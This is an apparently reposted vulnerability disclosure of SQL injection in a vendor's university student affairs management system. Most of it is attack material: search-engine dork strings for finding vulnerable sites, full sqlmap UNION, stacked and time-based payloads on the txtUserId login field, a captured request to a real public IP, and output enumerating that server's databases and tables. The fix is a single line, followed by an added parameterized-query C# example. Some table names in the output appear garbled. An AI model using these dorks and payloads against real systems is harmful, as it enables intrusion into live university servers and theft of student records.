
Generic SQL Injection Vulnerability in a University Management System

Source: 自学PHP网    Time: 2015-04-16 23:15


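Both the front end and the back end of the university student affairs management system (高校学生工作管理系统) from 西安奥达软件工程有限公司 contain SQL injection vulnerabilities.
1. Front end of the university student affairs management system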



intitle:学生工作管理系统 Login/List.aspx?ID=



Taking http://xxx/Login/List.aspx?ID=99 as an example:



sqlmap identified the following injection points with a total of 100 HTTP(s) requests:

---
 

Place: POST

Parameter: txtUserId

Type: UNION query

Title: Generic UNION query (NULL) - 6 columns

Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1' UNION ALL SELECT NULL, NULL, NULL, NULL, CHAR(58)+CHAR(98)+CHAR(104)+CHAR(120)+CHAR(58)+CHAR(86)+CHAR(105)+CHAR(99)+CHAR(109)+CHAR(119)+CHAR(79)+CHAR(68)+CHAR(83)+CHAR(71)+CHAR(79)+CHAR(58)+CHAR(120)+CHAR(112)+CHAR(112)+CHAR(58), NULL-- &txtPwd=1&RadioButtonList1=1&Button1=登 录



Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1'; WAITFOR DELAY '0:0:5';--&txtPwd=1&RadioButtonList1=1&Button1=登 录



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1' WAITFOR DELAY '0:0:5'--&txtPwd=1&RadioButtonList1=1&Button1=登 录

---


current user: 'auda'

current database: 'StudWorkXiDian'

available databases [7]:

[*] master

[*] model

[*] msdb

[*] Northwind

[*] pubs

[*] StudWorkXiDian

[*] tempdb



Cross-database access is possible:

Database: pubs

[14 tables]

+----------------------+

| [dbo/awthors] |

| [dbo/discounts] |

| [dbo/employee] |

| [dbo/jobs] |

| [dbo/pwb_info] |

| [dbo/pwblishers] |

| [dbo/roysched] |

| [dbo/sales] |

| [dbo/stores\t] |

| [dbo/sysconstraints] |

| [dbo/syssegments] |

| [dbo/titleawthor] |

| [dbo/titles\r\t] |

| [dbo/titleview] |

+----------------------+





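2. Back end of the university student affairs management system

Keyword: inurl:/Login/loginpageforuserb.aspx

Taking http://112.29/Login/loginpageforuserb.aspx as an example:

The username field (txtUserId) is not filtered, which leads to SQL injection.

Request captured with Burp: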



POST http://202.117.112.29/Login/loginpageforuserb.aspx HTTP/1.1
Host: 202.117.112.29
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://202.117.112.29/Login/loginpageforuserb.aspx
Cookie: ASP.NET_SessionId=oj5sbgn3ovvansabkijagoaz
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 719



__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj%2BS4jeiDveS4uuepugril4%2FlhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi%2Bk%2BWFpeiLseaWh%2BWNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj%2BS4jeiDveS4uuepugril4%2FlhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi%2Bk%2BWFpeiLseaWh%2BWNleW8leWPtycKHwECCmRkZI%2B9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=%2FwEWBwLo5YDJCAKz8dy8BQKd%2B7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1&txtPwd=1&RadioButtonList1=1&Button1=%E7%99%BB+%E5%BD%95



Place: POST

Parameter: txtUserId

Type: UNION query

Title: Generic UNION query (NULL) - 6 columns




Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries




Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind


---

[15:36:02] [INFO] the back-end DBMS is Microsoft SQL Server

web server operating system: Windows 2003

web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727

back-end DBMS: Microsoft SQL Server 2000

[15:36:02] [INFO] fetching current user

current user: 'auda'

[15:36:02] [INFO] fetching current database

current database: 'StudWorkXiDian'

[15:36:02] [INFO] fetching database names

[15:36:02] [INFO] the SQL query used returns 7 entries

[15:36:02] [INFO] resumed: "master"

[15:36:02] [INFO] resumed: "model"

[15:36:02] [INFO] resumed: "msdb"

[15:36:02] [INFO] resumed: "Northwind"

[15:36:02] [INFO] resumed: "pubs"

[15:36:02] [INFO] resumed: "StudWorkXiDian"

[15:36:02] [INFO] resumed: "tempdb"

available databases [7]:

[*] master

[*] model

[*] msdb

[*] Northwind

[*] pubs

[*] StudWorkXiDian

[*] tempdb






257 tables:



Database: StudWorkXiDian

[257 tables]



Fix:

Filter the multiple parameters involved.
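
An added example, not code from the original page or from the vendor: a parameterized form of a login lookup for the txtUserId and txtPwd fields seen in the captured request, shown next to a hypothetical concatenated query of the kind the sqlmap findings above imply. The table dbo.AppUser, its columns, the 64-character verifier length and the LoginRepository class are assumptions; the calls are the standard System.Data.SqlClient API available in ASP.NET 2.0.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Added illustration: dbo.AppUser, its columns and this class are hypothetical.
public static class LoginRepository
{
    // Hypothetical "before": the form value becomes part of the SQL text, so a
    // single quote in txtUserId ends the string literal and whatever follows
    // (UNION, a stacked statement, WAITFOR DELAY) is parsed as SQL.
    public static string BuildConcatenatedQuery(string userId, string pwdVerifier)
    {
        return "SELECT UserId, UserName, RoleId, Dept, Status, LastLogin " +
               "FROM dbo.AppUser WHERE UserId = '" + userId +
               "' AND PwdVerifier = '" + pwdVerifier + "'";
    }

    // "After": the SQL text is a constant and the form values are sent as
    // typed, length-bounded parameters, so they are only ever compared as data.
    // pwdVerifier stands for whatever value the application stores for the
    // password (ideally a salted hash computed before this call).
    public static bool CheckLogin(string connectionString,
                                  string userId, string pwdVerifier)
    {
        // Cheap validation first: reject empty or over-long input outright.
        if (string.IsNullOrEmpty(userId) || userId.Length > 30) return false;
        if (string.IsNullOrEmpty(pwdVerifier) || pwdVerifier.Length > 64) return false;

        const string sql =
            "SELECT COUNT(*) FROM dbo.AppUser " +
            "WHERE UserId = @userId AND PwdVerifier = @pwdVerifier";

        using (SqlConnection conn = new SqlConnection(connectionString))
        using (SqlCommand cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@userId", SqlDbType.VarChar, 30).Value = userId;
            cmd.Parameters.Add("@pwdVerifier", SqlDbType.VarChar, 64).Value = pwdVerifier;
            conn.Open();
            // COUNT(*) comes back as a boxed int; exactly one row means a match.
            return (int)cmd.ExecuteScalar() == 1;
        }
    }
}
```

Because the output above shows the application login 'auda' can enumerate other databases, running the application under a database account limited to its own database reduces what any remaining injection point can reach.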

 
